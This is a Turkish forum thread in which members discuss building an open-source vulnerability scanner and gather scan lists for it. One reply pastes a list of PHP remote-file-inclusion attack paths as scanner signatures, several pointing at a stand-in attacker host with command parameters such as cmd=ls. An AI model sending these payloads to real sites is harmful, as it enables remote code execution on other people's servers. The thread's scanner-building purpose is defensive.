Hazirlamakta oldugumuz Acik Kaynak Kodlu bir proje icin scan listelerinize ihtiyacimiz var (vulnerability scannerlarla kullandiklariniz *vuln scanner= zayiflik tarayicisi, cgi-scanner vs).

Proje lisansi degi$tigi icin bu topic gecersiz olmu$tur.

$imdiden cumlenize te$ekkurler.

Not: Bu orneklerdeki gibi girdileri, kendi scannerlarinizin veritabanindan, web, firewall ya da IDS loglarinizdan bulabilirsiniz.

:cool:

nessus benzeri bisi mi olacak?
detayli bilgi alabilmemiz mumkun mu

Bu konuda konu$mak icin henuz yetkili degilim, tek diyebilecegim nessus'tan otede olabilir.

:cool:

hade bakalım kolay gelsin :()

nessus gibi ben burdayim deyi bagirip cagirmaz insallah ;)

Bu konu uzerinde hala tarti$iyoruz..
IDS'ler artik o kadar geli$ti ki, olmadik yerlerden patternler bulup bir saldiriyi tespit edebiliyor, hatta ornegin dizin taramalarinda a ile baslayip z'ye dogru alfabetik olarak giden testlerin bile bir saldiri oldugunu anlayabiliyorlar.

Ama bizim amacimiz bir guvenlik araci yaratmak, saldiri amacli kullanacaklari du$undugumuz icin IDS'lere ozel stealthy bir mod du$unmeyebiliriz :)

:cool:

bizde guvenlik amacli kulanacagiz ki zaten :D
sonucta 'kotu niyetli saldirganlarin' (hasta oluyorum bu tabire bu arada) silahlarina sahip olmaliyiz ki kendimizi koruyalim... ;)

@redial;
"Malicious attacker" kelimesi ba$ka turlu nasil Turkceye nasil cevrilebilir?

:cool:

@asa
bilmem; ama kotu niyetli saldirgan deyince, saldirganin iyi niyetlisi de oluyomus gibi geliyor...

Greenpeace...

:cool:

Orjinal mesajı gönderen ASA
Greenpeace...

:cool:

:super:

diyecek birşey bulamıyorum.. :D

:)

isinize yara belki bunlar snooq amcamin arastirdigi bazi PHP saldiri imzalari
kaynak: http://www.angelfire.com/linux/snooq/php_sig.txt

/_head.php?_zb_path=http://attacker.example.com
/achievo/atk/javascript/class.atkdateattribute.js.php?config_atkroot=http://attacker.example.com?
/gallery/captionator.php?GALLERY_BASEDIR=http://attacker.example.com
/globals.php3?LangCookie=http://attacker.example.com
/include/msql.php?inc_dir=http://attacker.example.com&ext=txt
/include/mssql7.php?inc_dir=http://attacker.example.com&ext=txt
/include/mysql.php?inc_dir=http://attacker.example.com&ext=txt
/include/oci8.php?inc_dir=http://attacker.example.com&ext=txt
/include/postgres.php?inc_dir=http://attacker.example.com&ext=txt
/include/postgres65.php?inc_dir=http://attacker.example.com&ext=txt
/install.php?phpbb_root_dir=http://attacker.example.com
/mantis/login_page.php?g_meta_include_file=http://attacker.example.com
/page.php?template=http://your-ip/hello.html?
/phorum/admin/actions/del.php?include_path=http://attacker.example.com&cmd=ls
/phorum/plugin/replace/plugin.php?PHORUM[settings_dir]=http://attacker.example.com&cmd=ls
/pollensondage.inc.php?app_path=http://attacker.example.com
/user/agora_user.php?inc_dir=http://attacker.example.com&ext=txt
/user/ldap_example.php?inc_dir=http://attacker.example.com&ext=txt
/userlist.php?ME=http://attacker.example.com

Yaw piyasda bi sürü proğram var onlari kur kur listleri al.
Gerçi ben o prg larını hiç birinin bi şey bulduğunu gormedim ama..
Ama sizin projenin bi farklı yanı olmalı değil mi? Farkını nezaman öğreneceğiz.

Piyasa da ki o bi sürü program ASA yı herhalde ilgilendirmiyor ki, Uzman yollarını sordu... ;)

O piyasadaki bir suru program elimizde mevcut, ayrica piyasa haricindeki bir suru program da elimizde mevcut.

Yine de bunlarin di$inda gozumuzden kacmi$ bir program varsa, ya da az bilinen ama bizim bilmedigimiz generic bir durum soz konusu ise ve bu kullandiginiz IDS veya firewall loglarina takilmi$ ise gerekebilecegini du$undugumuz icin ben bu topici actim.

Ayrica o piyasadaki birsuru program, dogru kullanildiklarinda bir suru $eyi bulabilir, ancak script kiddie misali degil, "security assesment tool" olarak kullanildiklarinda i$e yarayacaklardir, netekim bunun icin yapilmi$lardir.

Kalkip bir FreeBSD'de IIS'le ilgili aciklar taranacak olursa, tabii ki bir$ey bulunamamasi normaldir.

Bu arada bizim projemizle ilgili ufak bir not daha, bu "cihaz" kar$i sistemi taniyor ("OS fingerprinting, banners vs") ve ona gore veritabanindan gerekli bolumleri secip ayikliyor...

:cool:

peki bu is icin hersey bastan mi yazildi yoksa o isi yapan bir programcik mi devreye giriyor ?
misal OS tanimi icin nmap Queso..gibi bisi mi kullanilacak yoksa kendi yazdiginiz yazilim mi

Ya biliyorum ASA'nin onlarla ilgilenmedigini. Ama ne bilim bi garip geldi bana yaa... Ben daha dediğim gibi vuln scanner lerin bi işe yaradiğini gormedim. Kullanim haggetten bi sonuç varmi?
Yani aha lan bi bug bulduk anaaaa diyen...

Orjinal mesajı gönderen merak
Ya biliyorum ASA'nin onlarla ilgilenmedigini. Ama ne bilim bi garip geldi bana yaa... Ben daha dediğim gibi vuln scanner lerin bi işe yaradiğini gormedim. Kullanim haggetten bi sonuç varmi?
Yani aha lan bi bug bulduk anaaaa diyen...

galiba exploitciler-e pek takilmiyosunuz :)

-----------
ASA demiski:
Kalkip bir FreeBSD'de IIS'le ilgili aciklar taranacak olursa, tabii ki bir$ey bulunamamasi normaldir.
----------
Sanirim seninkisi bu kucuk ayrinti ile ilgili...
Yoksa koca program neden bisiy bulamasin degil mi?

...ki misal Nessus bile hicbi$i bulamasa, utancindan tracert dokumunu, acik portlarin bannerlarini verir.

:cool:

Scan listelerinizle ilgili mesaj ya da mail yollamayin arkada$lar, daha sonra aciklarim nedenini. Gosterdiginiz ilgiye te$ekkurler.

:cool:

// double post.